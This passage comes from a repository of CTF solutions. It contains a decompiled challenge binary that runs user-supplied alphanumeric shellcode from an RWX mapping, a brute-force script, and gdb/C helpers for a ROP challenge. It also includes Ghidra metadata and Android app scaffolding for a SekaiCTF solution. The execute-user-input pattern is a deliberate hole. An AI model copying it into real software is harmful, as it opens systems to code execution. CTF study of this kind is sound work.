  int v6; // [esp+Ch] [ebp-1Ch]
  char *s; // [esp+10h] [ebp-18h]
  void *code; // [esp+14h] [ebp-14h]
  void *v9; // [esp+18h] [ebp-10h]
  unsigned int v10; // [esp+1Ch] [ebp-Ch]

  v10 = __readgsdword(0x14u);
  n = 500;   // read limit passed to fgets and length passed to mmap
  v6 = 499;  // assigned but not read again in this listing
  v0 = alloca(512);
  STACK[0x1FC] = STACK[0x1FC];
  // buf is taken as the address of v4; presumably this aliases the start of
  // the alloca'd region in the decompiler's stack model - confirm.
  char *buf = (char *)&v4;
  printf("Run SCAAS (alphanumeric shellcode, max 500 bytes): ");

  //Reading stops after an EOF or a newline.
  // fgets stores at most n-1 = 499 bytes plus the terminator.
  fgets(buf, n, stdin);
  buf[strcspn(buf, "\n")] = '\0'; // NULL terminator

  if ( is_alphanumeric(buf) != 1 ) {
    puts("Error: shellcode must be alphanumeric");
  } else {
    // Fresh private anonymous mapping with R, W and X all set.
    code = mmap(
      NULL, n,
      PROT_READ | PROT_WRITE| PROT_EXEC,
      MAP_PRIVATE | MAP_ANONYMOUS,
      -1, 0
    );
    if ( code == (void *)-1 ) {
      perror("mmap");
    } else {
      // Copies only up to the first NUL; an empty line copies nothing and the
      // call below still happens.
      memcpy(code, buf, strlen(buf));
      v9 = code;
      ( (void (*)(void))code )(); //invoke shellcode
    }
  }
  return v10 - __readgsdword(0x14u);
}

/*
 * Returns 1 if every byte of the NUL-terminated string has bit 8 set in the
 * table returned by __ctype_b_loc(), and 0 at the first byte that does not.
 * The empty string returns 1.
 *
 * NOTE(review): mask 8 is presumably glibc's _ISalnum on a little-endian
 * target, and c is a plain char used directly as the table index - confirm
 * both against the binary.
 */
int is_alphanumeric(char *str) {
  char *cptr = str;
  while(1) {
    char c = *cptr;
    if (c == 0)
      return 1; //success

    ushort **ppuVar1 = __ctype_b_loc(); //https://stackoverflow.com/questions/37702434/ctype-b-loc-what-is-its-purpose
    if ( ((*ppuVar1)[c] & 8) == 0)
      return 0;
    ++cptr;
  }
}
-------------------------------------------------------------------------------- /midnight-quals-23/pwn/scaas/src/scaas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/pwn/scaas/src/scaas -------------------------------------------------------------------------------- /midnight-quals-23/rev/oss/resources/xref-puts-O0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/rev/oss/resources/xref-puts-O0.png -------------------------------------------------------------------------------- /midnight-quals-23/rev/oss/resources/xref-puts-O2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/rev/oss/resources/xref-puts-O2.png
-------------------------------------------------------------------------------- /midnight-quals-23/rev/oss/solution/Makefile: -------------------------------------------------------------------------------- 1 | 2 | 3 | all: oss.angr.O0 oss.angr.O2 4 | 5 | oss.angr.O0: oss.angr.c 6 | gcc -O0 -g -o oss.angr.O0 oss.angr.c -no-pie 7 | 8 | oss.angr.O2: oss.angr.c 9 | gcc -O2 -g -o oss.angr.O2 oss.angr.c -no-pie 10 | 11 | clean: 12 | rm -f oss.angr.O0 oss.angr.O2 13 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/Makefile: -------------------------------------------------------------------------------- 1 | 2 | CC=gcc 3 | CFLAGS=-g -O0 4 | 5 | .PHONY: all 6 | all: dummy 7 | 8 | dummy: dummy.c 9 | $(CC) $(CFLAGS) -o $@ $^ 10 | 11 | clean: 12 | rm -rf *.o dummy 13 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/brutter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | while : 4 | do 5 | python solution.py "$@" 6 | if [ $? 
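-eq 0 ]; then 7 | break 8 | fi 9 | done 10 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/dummy.c: --------------------------------------------------------------------------------


#include
#include
#include
#include

typedef void (*srand_t)(unsigned int __seed);
typedef int (*rand_t)(void);

/*
 * Fills a 0x10000000-byte anonymous mapping with successive rand() values
 * taken from ./libc.so.6, seeded with the integer in argv[1], and prints the
 * mapping's address.
 *
 * Returns 0 on success and 1 on bad usage or when the mapping, the library or
 * either symbol cannot be obtained.
 */
int main(int argc, char * argv[]) {
    if (argc != 2) {
        printf("Invalid arguments\n");
        return 1;
    }
    int seed = atoi(argv[1]);

    int *addr = mmap(NULL, 0x10000000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS , -1, 0);
    /* mmap reports failure as MAP_FAILED, not NULL, so a NULL test never
     * fires and the fill loop below would write through an invalid pointer. */
    if (addr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    printf("%p\n", (void *)addr);

    void *libc_handle = dlopen("./libc.so.6", RTLD_LAZY);
    if(!libc_handle) {
        printf("dlopen: %s\n", dlerror());
        return 1;
    }

    /* A missing symbol must stop the run: calling through a NULL function
     * pointer would crash. The error paths do not call dlclose because the
     * companion dummy.gdbscript uses dlclose as the point where it dumps the
     * mapping, and a partially filled mapping should not be dumped. */
    srand_t srand_func = dlsym(libc_handle, "srand");
    if(!srand_func) {
        printf("dlsym srand: %s\n", dlerror());
        return 1;
    }
    rand_t rand_func = dlsym(libc_handle, "rand");
    if(!rand_func) {
        printf("dlsym rand: %s\n", dlerror());
        return 1;
    }

    srand_func(seed);
    /* 0x4000000 ints cover the whole 0x10000000-byte mapping when int is
     * 4 bytes wide. */
    for(int i=0; i<0x4000000; i++) {
        addr[i] = rand_func();
    }
    if(dlclose(libc_handle) != 0)
        printf("dlclose: %s\n", dlerror());
    return 0;
}
-------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/dummy.gdbscript: -------------------------------------------------------------------------------- 1 | 2 | # gdb -x dummy.gdbscript --nh --args ./dummy 1234 3 | 4 | set confirm off 5 | set pagination off 6 | set disassembly-flavor intel 7 | 8 | b *main 9 | command 10 | silent 11 | 12 | # Break when mmap returns. 13 | # To achieve that, we tbreak at mmap entry and then insert a breakpoint 14 | # at the return address.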
15 | tbreak *mmap 16 | command 17 | silent 18 | tbreak *(*(char**)($rsp)) 19 | command 20 | silent 21 | set $addr=$rax 22 | continue 23 | end 24 | continue 25 | end 26 | continue 27 | end 28 | 29 | b *dlclose 30 | command 31 | silent 32 | x/10bx $addr 33 | dump memory code $addr $addr+0x10000000 34 | continue 35 | end 36 | 37 | set $_exitcode = -999 38 | define hook-stop 39 | if $_exitcode != -999 40 | printf "exit code: %d\n", $_exitcode 41 | quit 42 | end 43 | end 44 | 45 | run 46 | 47 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/resources/roborop.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-24/pwn/roborop/resources/roborop.tar.gz -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/pwnable.tw/3x17/3x17 -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.gpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/pwnable.tw/3x17/3x17-ghidra.gpr -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/idata/00/00000000.prp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/idata/00/~00000000.db/db.13.gbf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/pwnable.tw/3x17/3x17-ghidra.rep/idata/00/~00000000.db/db.13.gbf -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/idata/~index.bak: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | 00000000:3x17:7f0119dfd1381071386625 4 | NEXT-ID:1 5 | MD5:d41d8cd98f00b204e9800998ecf8427e 6 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/idata/~index.dat: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | 00000000:3x17:7f0119dfd1381071386625 4 | NEXT-ID:1 5 | MD5:d41d8cd98f00b204e9800998ecf8427e 6 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/project.prp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/projectState: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/user/~index.dat: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | NEXT-ID:0 4 | MD5:d41d8cd98f00b204e9800998ecf8427e 5 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/versioned/~index.bak: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | NEXT-ID:0 4 | MD5:d41d8cd98f00b204e9800998ecf8427e 5 | 
-------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/versioned/~index.dat: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | NEXT-ID:0 4 | MD5:d41d8cd98f00b204e9800998ecf8427e 5 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/resources/secure_app.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/resources/secure_app.apk -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/.gitignore: -------------------------------------------------------------------------------- 1 | *.iml 2 | .gradle 3 | /local.properties 4 | /.idea/caches 5 | /.idea/libraries 6 | /.idea/modules.xml 7 | /.idea/workspace.xml 8 | /.idea/navEditor.xml 9 | /.idea/assetWizardSettings.xml 10 | .DS_Store 11 | /build 12 | /captures 13 | .externalNativeBuild 14 | .cxx 15 | local.properties 16 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/.gitignore: -------------------------------------------------------------------------------- 1 | /build -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/build.gradle.kts: -------------------------------------------------------------------------------- 1 | plugins { 2 | alias(libs.plugins.android.application) 3 | alias(libs.plugins.jetbrains.kotlin.android) 4 | } 5 | 6 | android { 7 | namespace = "zero.tolerance.sekaidemo" 8 | compileSdk = 34 9 | 10 | defaultConfig { 11 | applicationId = "zero.tolerance.sekaidemo" 12 | minSdk = 28 13 | targetSdk = 34 14 | versionCode = 1 15 | versionName = "1.0" 16 | 17 | testInstrumentationRunner = 
"androidx.test.runner.AndroidJUnitRunner" 18 | } 19 | 20 | buildTypes { 21 | release { 22 | isMinifyEnabled = false 23 | proguardFiles( 24 | getDefaultProguardFile("proguard-android-optimize.txt"), 25 | "proguard-rules.pro" 26 | ) 27 | } 28 | } 29 | compileOptions { 30 | sourceCompatibility = JavaVersion.VERSION_1_8 31 | targetCompatibility = JavaVersion.VERSION_1_8 32 | } 33 | kotlinOptions { 34 | jvmTarget = "1.8" 35 | } 36 | } 37 | 38 | dependencies { 39 | 40 | implementation(libs.androidx.core.ktx) 41 | implementation(libs.androidx.appcompat) 42 | implementation(libs.material) 43 | implementation(libs.androidx.activity) 44 | implementation(libs.androidx.constraintlayout) 45 | testImplementation(libs.junit) 46 | androidTestImplementation(libs.androidx.junit) 47 | androidTestImplementation(libs.androidx.espresso.core) 48 | } -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/proguard-rules.pro: -------------------------------------------------------------------------------- 1 | # Add project specific ProGuard rules here. 2 | # You can control the set of applied configuration files using the 3 | # proguardFiles setting in build.gradle. 4 | # 5 | # For more details, see 6 | # http://developer.android.com/guide/developing/tools/proguard.html 7 | 8 | # If your project uses WebView with JS, uncomment the following 9 | # and specify the fully qualified class name to the JavaScript interface 10 | # class: 11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview { 12 | # public *; 13 | #} 14 | 15 | # Uncomment this to preserve the line number information for 16 | # debugging stack traces. 17 | #-keepattributes SourceFile,LineNumberTable 18 | 19 | # If you keep the line number information, uncomment this to 20 | # hide the original source file name. 
21 | #-renamesourcefileattribute SourceFile -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 7 | 8 | 9 | 19 | 22 | 23 | 24 | 25 | 26 | 27 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/drawable/ic_launcher_foreground.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 15 | 18 | 21 | 22 | 23 | 24 | 30 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/layout/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 9 | 10 | 18 | 19 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/layout/overlay_view.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 12 | 13 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-anydpi/ic_launcher.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-anydpi/ic_launcher_round.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-hdpi/ic_launcher.webp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-hdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-hdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-hdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-mdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-mdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-mdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-mdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xhdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xhdpi/ic_launcher.webp -------------------------------------------------------------------------------- 
/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xhdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xhdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxhdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxhdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxxhdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxxhdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/values-night/themes.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/values/colors.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | #FF000000 4 | #FFFFFFFF 5 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/values/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | SekaiDemo 3 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/values/themes.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 |